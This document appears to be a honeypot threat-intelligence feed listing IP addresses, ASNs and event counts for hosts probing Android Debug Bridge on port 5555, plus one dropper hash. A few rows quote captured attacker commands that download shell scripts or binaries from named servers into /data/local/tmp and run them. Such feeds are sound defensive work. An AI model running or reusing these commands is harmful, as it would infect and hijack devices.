SHA-256	064fc04504e868ec0f453d426b77a25fdeaeda9abb9dc72ec5dcede19bdf157f	ADB dropper sample / Captured within last 1h by ADBHoney; outfile=dl/064fc04504e868ec0f453d426b77a25fdeaeda9abb9dc72ec5dcede19bdf157f.raw; last_seen=2026-05-01T00:17:05.930Z	nadsec, tpot, adbhoney, dropper, sample, sha256	2026-05-01
IPv4	205.210.31.136	Attacker IP • ADB / seen in ADBHoney; events=19; ports=5555; cc=US; asn=396982; asn_org=Google LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=0	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-01
IPv4	130.12.180.65	Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=NL; asn=202412; asn_org=Omegatech LTD; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=1888 \| first_seen=2026-05-02T09:10:48.000Z \| last_seen=2026-05-31T21:27:27.269Z \| ports=5555 \| cc=NL \| asn=202412 \| org=Omegatech LTD	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-01
IPv4	45.205.1.8	Attacker IP • ADB / seen in ADBHoney; events=10; ports=5555; cc=US; asn=215925; asn_org=Vpsvault.host Ltd; adb_cmd_hits=1; cmd="cd /data/local/tmp;mkdir .p 2>/dev/null;cd .p;(wget -qO b http://196.251.107.133/bins/parm7 2>/dev/null\|\|busybox wget -qO b http://196.251.107.133/bins/parm7 2>" Observed in ADBHoney telemetry for 2026-05. events=1198 \| first_seen=2026-05-02T01:15:39.000Z \| last_seen=2026-05-12T08:37:28.983Z \| ports=5555 \| cc=US \| asn=215925 \| org=Vpsvault.host Ltd	malware_hosting, nadsec, tpot, adbhoney, android, iot	2026-05-01
IPv4	112.90.220.243	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=CN; asn=134543; asn_org=China Unicom Guangdong IP network; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=0	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-01
IPv4	112.90.220.247	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=CN; asn=134543; asn_org=China Unicom Guangdong IP network; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=0	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-01
IPv4	104.243.35.104	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=23470; asn_org=ReliableSite.Net LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=322 \| first_seen=2026-05-02T21:49:40.000Z \| last_seen=2026-05-31T14:36:20.659Z \| ports=5555 \| cc=US \| asn=23470 \| org=ReliableSite.Net LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-01
IPv4	65.49.1.108	Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=0	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-01
IPv4	65.49.1.116	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=0	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-01
IPv4	88.210.63.192	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=UA; asn=211736; asn_org=FOP Dmytro Nedilskyi; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=0	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-01
IPv4	204.76.203.224	Attacker IP • ADB / seen in ADBHoney; events=19; ports=5555; cc=NL; asn=51396; asn_org=Pfcloud UG (haftungsbeschrankt); adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=18 \| first_seen=2026-05-08T08:26:32.000Z \| last_seen=2026-05-21T08:24:32.731Z \| ports=5555 \| cc=NL \| asn=51396 \| org=Pfcloud UG (haftungsbeschrankt)	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-01
IPv4	204.76.203.225	Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=NL; asn=51396; asn_org=Pfcloud UG (haftungsbeschrankt); adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=29 \| first_seen=2026-05-07T16:25:27.000Z \| last_seen=2026-05-20T09:48:41.124Z \| ports=5555 \| cc=NL \| asn=51396 \| org=Pfcloud UG (haftungsbeschrankt)	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-01
IPv4	204.76.203.226	Attacker IP • ADB / seen in ADBHoney; events=10; ports=5555; cc=NL; asn=51396; asn_org=Pfcloud UG (haftungsbeschrankt); adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=18 \| first_seen=2026-05-08T08:26:22.000Z \| last_seen=2026-05-21T08:24:22.805Z \| ports=5555 \| cc=NL \| asn=51396 \| org=Pfcloud UG (haftungsbeschrankt)	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-01
IPv4	110.177.176.2	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=CN; asn=4134; asn_org=Chinanet; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=0	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-01
IPv4	112.122.236.206	Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=CN; asn=140726; asn_org=UNICOM AnHui province network; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=0	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-01
IPv4	118.212.120.42	Attacker IP • ADB / seen in ADBHoney; events=11; ports=5555; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=0	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-01
IPv4	118.212.123.246	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=0	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-01
IPv4	124.66.72.232	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=0	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-01
IPv4	124.72.224.234	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=CN; asn=4134; asn_org=Chinanet; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=0	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-01
IPv4	175.17.182.245	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=0	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-01
IPv4	185.141.119.89	Attacker IP • ADB / seen in ADBHoney; events=18; ports=5555; cc=US; asn=207990; asn_org=HostRoyale Technologies Pvt Ltd; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=14 \| first_seen=2026-05-02T22:25:20.000Z \| last_seen=2026-05-02T22:35:34.114Z \| ports=5555 \| cc=US \| asn=207990 \| org=HostRoyale Technologies Pvt Ltd	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-01
IPv4	222.176.201.242	Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=CN; asn=4134; asn_org=Chinanet; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=0	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-01
IPv4	42.48.38.209	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=0	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-01
IPv4	223.123.73.133	Attacker IP • ADB / seen in ADBHoney; events=11; ports=5555; cc=PK; asn=59257; asn_org=CMPak Limited; cats=Attempted Administrator Privilege Gain; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=0	malware_hosting, nadsec, tpot, adbhoney, android, iot	2026-05-01
IPv4	176.65.139.61	Attacker IP • ADB / seen in ADBHoney; events=15; ports=5555; cc=LU; asn=214472; asn_org=Offshore LC; adb_cmd_hits=0; cmd="cd /data/local/tmp/; busybox wget http://176.65.139.61/bb.sh; sh bb.sh; curl http://176.65.139.61/bb.sh; sh bb.sh" Observed in ADBHoney telemetry for 2026-05. events=65 \| first_seen=2026-05-02T21:56:57.000Z \| last_seen=2026-05-24T00:40:21.000Z \| ports=5555 \| cc=LU \| asn=214472 \| org=Offshore LC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-01
IPv4	186.50.255.112	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=UY; asn=6057; asn_org=Administracion Nacional de Telecomunicaciones; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=0	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-01
IPv4	176.65.139.140	Attacker IP • ADB / seen in ADBHoney; events=14; ports=5555; cc=LU; asn=214472; asn_org=Offshore LC; adb_cmd_hits=0; cmd="cd /data/local/tmp/; busybox wget http://83.168.110.191/cat.sh; sh cat.sh; curl http://83.168.110.191/cat.sh; sh cat.sh; wget http://83.168.110.191/cat.sh; sh c" Observed in ADBHoney telemetry for 2026-05. events=1411 \| first_seen=2026-05-02T11:23:01.000Z \| last_seen=2026-05-31T21:57:56.668Z \| ports=5555 \| cc=LU \| asn=214472 \| org=Offshore LC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-01
IPv4	172.234.199.93	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=63949; asn_org=Akamai Connected Cloud; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-06T15:51:24.000Z \| last_seen=2026-05-06T15:52:28.200Z \| ports=5555 \| cc=US \| asn=63949 \| org=Akamai Connected Cloud	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-01
IPv4	184.105.139.67	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=0	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-01
IPv4	184.105.139.99	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=0	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-01
IPv4	45.56.83.149	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=63949; asn_org=Akamai Connected Cloud; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=6 \| first_seen=2026-05-07T15:49:00.000Z \| last_seen=2026-05-07T15:50:02.466Z \| ports=5555 \| cc=US \| asn=63949 \| org=Akamai Connected Cloud	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-01
IPv4	193.32.162.28	Attacker IP • ADB / seen in ADBHoney; events=56; ports=5555; cc=RO; asn=47890; asn_org=Unmanaged Ltd; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=267 \| first_seen=2026-05-07T08:55:09.000Z \| last_seen=2026-05-24T00:41:00.999Z \| ports=5555 \| cc=RO \| asn=47890 \| org=Unmanaged Ltd	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-01
IPv4	176.65.139.54	Attacker IP • ADB / seen in ADBHoney; events=16; ports=5555; cc=LU; asn=214472; asn_org=Offshore LC; cats=Generic Protocol Command Decode; adb_cmd_hits=0; cmd="pm list packages \| grep -q "com.dickboot.myapp" && ps \| grep -v grep \| grep -q "com.dickboot.myapp" && echo "[+] Already running" \|\| { mkdir -p /data/local/tmp/" Observed in ADBHoney telemetry for 2026-05. events=0	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-01
IPv4	161.97.66.49	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=FR; asn=51167; asn_org=Contabo GmbH; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=15 \| first_seen=2026-05-02T15:34:13.000Z \| last_seen=2026-05-03T12:37:44.361Z \| ports=5555 \| cc=FR \| asn=51167 \| org=Contabo GmbH	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-01
IPv4	92.63.197.181	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=UA; asn=211736; asn_org=FOP Dmytro Nedilskyi; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=0	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-01
IPv4	159.223.189.125	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=14061; asn_org=DigitalOcean, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=0	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-02
IPv4	216.218.206.126	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-02T00:33:56.000Z \| last_seen=2026-05-02T00:35:04.057Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-02
IPv4	216.218.206.66	Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=6 \| first_seen=2026-05-02T00:35:45.000Z \| last_seen=2026-05-02T00:40:45.604Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-02
IPv4	64.62.197.182	Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=16 \| first_seen=2026-05-02T03:49:36.000Z \| last_seen=2026-05-18T15:20:58.359Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-02
IPv4	64.62.197.189	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=4 \| first_seen=2026-05-02T03:48:17.000Z \| last_seen=2026-05-02T03:49:23.952Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-02
IPv4	20.169.105.81	Attacker IP • ADB / seen in ADBHoney; events=26; ports=5555; cc=US; asn=8075; asn_org=Microsoft Corporation; cats=Detection of a Network Scan; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=26 \| first_seen=2026-05-02T05:34:54.000Z \| last_seen=2026-05-02T05:46:21.842Z \| ports=5555 \| cc=US \| asn=8075 \| org=Microsoft Corporation	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-02
IPv4	1.31.31.7	Attacker IP • ADB / seen in ADBHoney; events=62; ports=5555; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; adb_cmd_hits=27; cmd="/data/local/tmp/nohup /data/local/tmp/log" Observed in ADBHoney telemetry for 2026-05. events=62 \| first_seen=2026-05-02T06:36:20.000Z \| last_seen=2026-05-02T06:49:57.837Z \| ports=5555 \| cc=CN \| asn=4837 \| org=CHINA UNICOM China169 Backbone \| related_hashes=608ee011537005f368c9731f4c4dee6a247b620cde52908ed0678df28c617971,7a48c93c5cb63a09505a009260d1cca8203285e0c1c6ff5b0df9cbb470820865,d4e8c642ac8485d2ac316f16b5ed2285c93734c62a3e1bc2852a49f3737053c5,d7188b8c575367e10ea8b36ec7cca067ef6ce6d26ffa8c74b3faa0b14ebb8ff0	malware_hosting, nadsec, tpot, adbhoney, android, iot, dropper, malware-distribution	2026-05-02
IPv4	198.235.24.25	Attacker IP • ADB / seen in ADBHoney; events=18; ports=5555; cc=US; asn=396982; asn_org=Google LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=22 \| first_seen=2026-05-02T06:56:54.000Z \| last_seen=2026-05-02T07:08:49.585Z \| ports=5555 \| cc=US \| asn=396982 \| org=Google LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-02
IPv4	64.23.241.205	Attacker IP • ADB / seen in ADBHoney; events=12; ports=5555; cc=US; asn=14061; asn_org=DigitalOcean, LLC; cats=Detection of a Network Scan,Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=12 \| first_seen=2026-05-02T07:44:10.000Z \| last_seen=2026-05-02T07:54:24.636Z \| ports=5555 \| cc=US \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-02
IPv4	162.216.150.116	Attacker IP • ADB / seen in ADBHoney; events=16; ports=5555; cc=US; asn=396982; asn_org=Google LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=16 \| first_seen=2026-05-02T08:20:56.000Z \| last_seen=2026-05-02T08:32:04.045Z \| ports=5555 \| cc=US \| asn=396982 \| org=Google LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-02
IPv4	121.158.231.41	Attacker IP • ADB / seen in ADBHoney; events=14; ports=5555; cc=KR; asn=4766; asn_org=Korea Telecom; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=14 \| first_seen=2026-05-02T10:31:19.000Z \| last_seen=2026-05-02T10:41:22.711Z \| ports=5555 \| cc=KR \| asn=4766 \| org=Korea Telecom	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-02
IPv4	185.246.128.25	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=SE; asn=42237; asn_org=w1n ltd; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=63 \| first_seen=2026-05-02T10:36:03.000Z \| last_seen=2026-05-31T06:42:36.865Z \| ports=5555 \| cc=SE \| asn=42237 \| org=w1n ltd	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-02
IPv4	185.93.89.191	Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=IR; asn=213790; asn_org=Limited Network LTD; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=6 \| first_seen=2026-05-02T11:31:15.000Z \| last_seen=2026-05-02T11:32:20.396Z \| ports=5555 \| cc=IR \| asn=213790 \| org=Limited Network LTD	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-02
IPv4	176.65.139.115	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=LU; asn=214472; asn_org=Offshore LC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=4 \| first_seen=2026-05-02T13:48:37.000Z \| last_seen=2026-05-02T13:49:45.731Z \| ports=5555 \| cc=LU \| asn=214472 \| org=Offshore LC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-02
IPv4	85.11.183.21	Attacker IP • ADB / seen in ADBHoney; events=19; ports=5555; cc=GB; asn=201002; asn_org=PebbleHost Ltd; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=38 \| first_seen=2026-05-03T00:24:09.000Z \| last_seen=2026-05-04T22:40:17.068Z \| ports=5555 \| cc=GB \| asn=201002 \| org=PebbleHost Ltd	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-03
IPv4	205.210.31.12	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=396982; asn_org=Google LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=22 \| first_seen=2026-05-03T01:59:55.000Z \| last_seen=2026-05-03T02:11:27.142Z \| ports=5555 \| cc=US \| asn=396982 \| org=Google LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-03
IPv4	45.148.9.8	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=47890; asn_org=Unmanaged Ltd; cats=Misc activity,Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=10 \| first_seen=2026-05-03T02:10:43.000Z \| last_seen=2026-05-18T01:55:27.692Z \| ports=5555 \| cc=US \| asn=47890 \| org=Unmanaged Ltd	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-03
IPv4	64.227.106.112	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=US; asn=14061; asn_org=DigitalOcean, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=7 \| first_seen=2026-05-03T02:19:22.000Z \| last_seen=2026-05-03T02:20:32.724Z \| ports=5555 \| cc=US \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-03
IPv4	71.239.37.238	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=US; asn=7922; asn_org=Comcast Cable Communications, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=7 \| first_seen=2026-05-03T02:25:10.000Z \| last_seen=2026-05-03T02:35:14.599Z \| ports=5555 \| cc=US \| asn=7922 \| org=Comcast Cable Communications, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-03
IPv4	134.199.221.159	Attacker IP • ADB / seen in ADBHoney; events=15; ports=5555; cc=US; asn=14061; asn_org=DigitalOcean, LLC; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=15 \| first_seen=2026-05-03T03:11:21.000Z \| last_seen=2026-05-03T03:21:30.490Z \| ports=5555 \| cc=US \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-03
IPv4	160.119.76.63	Attacker IP • ADB / seen in ADBHoney; events=13; ports=5555; cc=SC; asn=49870; asn_org=Alsycon B.V.; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=27 \| first_seen=2026-05-03T03:05:37.000Z \| last_seen=2026-05-21T11:51:57.633Z \| ports=5555 \| cc=SC \| asn=49870 \| org=Alsycon B.V.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-03
IPv4	185.93.89.190	Attacker IP • ADB / seen in ADBHoney; events=18; ports=5555; cc=IR; asn=213790; asn_org=Limited Network LTD; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=18 \| first_seen=2026-05-03T05:00:33.000Z \| last_seen=2026-05-03T05:01:55.112Z \| ports=5555 \| cc=IR \| asn=213790 \| org=Limited Network LTD	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-03
IPv4	185.93.89.192	Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=IR; asn=213790; asn_org=Limited Network LTD; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=9 \| first_seen=2026-05-03T05:00:43.000Z \| last_seen=2026-05-03T05:02:00.113Z \| ports=5555 \| cc=IR \| asn=213790 \| org=Limited Network LTD	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-03
IPv4	185.93.89.193	Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=IR; asn=213790; asn_org=Limited Network LTD; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=9 \| first_seen=2026-05-03T05:00:33.000Z \| last_seen=2026-05-03T05:01:46.150Z \| ports=5555 \| cc=IR \| asn=213790 \| org=Limited Network LTD	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-03
IPv4	64.62.156.162	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=17 \| first_seen=2026-05-03T05:26:54.000Z \| last_seen=2026-05-12T01:55:02.866Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-03
IPv4	64.62.156.168	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=4 \| first_seen=2026-05-03T05:26:03.000Z \| last_seen=2026-05-03T05:27:10.982Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-03
IPv4	130.162.228.25	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=DE; asn=31898; asn_org=Oracle Corporation; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=4 \| first_seen=2026-05-03T06:46:24.000Z \| last_seen=2026-05-03T06:47:25.271Z \| ports=5555 \| cc=DE \| asn=31898 \| org=Oracle Corporation	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-03
IPv4	185.141.119.51	Attacker IP • ADB / seen in ADBHoney; events=18; ports=5555; cc=US; asn=207990; asn_org=HostRoyale Technologies Pvt Ltd; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=18 \| first_seen=2026-05-03T08:01:22.000Z \| last_seen=2026-05-03T08:11:37.408Z \| ports=5555 \| cc=US \| asn=207990 \| org=HostRoyale Technologies Pvt Ltd	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-03
IPv4	194.50.16.198	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=NL; asn=49870; asn_org=Alsycon B.V.; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=468 \| first_seen=2026-05-03T09:25:06.000Z \| last_seen=2026-05-13T01:53:09.611Z \| ports=5555 \| cc=NL \| asn=49870 \| org=Alsycon B.V.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-03
IPv4	184.105.247.196	Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=16 \| first_seen=2026-05-03T11:20:41.000Z \| last_seen=2026-05-05T15:06:05.020Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-03
IPv4	184.105.247.232	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=4 \| first_seen=2026-05-03T11:19:06.000Z \| last_seen=2026-05-03T11:20:15.262Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-03
IPv4	141.98.10.25	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=LT; asn=209605; asn_org=UAB Host Baltic; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=4 \| first_seen=2026-05-03T12:49:58.000Z \| last_seen=2026-05-03T12:51:11.472Z \| ports=5555 \| cc=LT \| asn=209605 \| org=UAB Host Baltic	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-03
IPv4	176.65.139.81	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=LU; asn=214472; asn_org=Offshore LC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=8 \| first_seen=2026-05-03T12:23:16.000Z \| last_seen=2026-05-03T12:43:34.696Z \| ports=5555 \| cc=LU \| asn=214472 \| org=Offshore LC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-03
IPv4	185.141.119.71	Attacker IP • ADB / seen in ADBHoney; events=16; ports=5555; cc=US; asn=207990; asn_org=HostRoyale Technologies Pvt Ltd; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=39 \| first_seen=2026-05-03T12:54:15.000Z \| last_seen=2026-05-04T22:29:16.198Z \| ports=5555 \| cc=US \| asn=207990 \| org=HostRoyale Technologies Pvt Ltd	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-03
IPv4	176.65.132.53	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=DE; asn=51396; asn_org=Pfcloud UG (haftungsbeschrankt); adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=40 \| first_seen=2026-05-03T13:51:25.000Z \| last_seen=2026-05-05T01:53:00.277Z \| ports=5555 \| cc=DE \| asn=51396 \| org=Pfcloud UG (haftungsbeschrankt)	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-03
IPv4	37.60.241.154	Attacker IP • ADB / seen in ADBHoney; events=10; ports=5555; cc=FR; asn=51167; asn_org=Contabo GmbH; cats=Misc activity; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=19 \| first_seen=2026-05-03T13:29:01.000Z \| last_seen=2026-05-08T15:56:07.200Z \| ports=5555 \| cc=FR \| asn=51167 \| org=Contabo GmbH	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-03
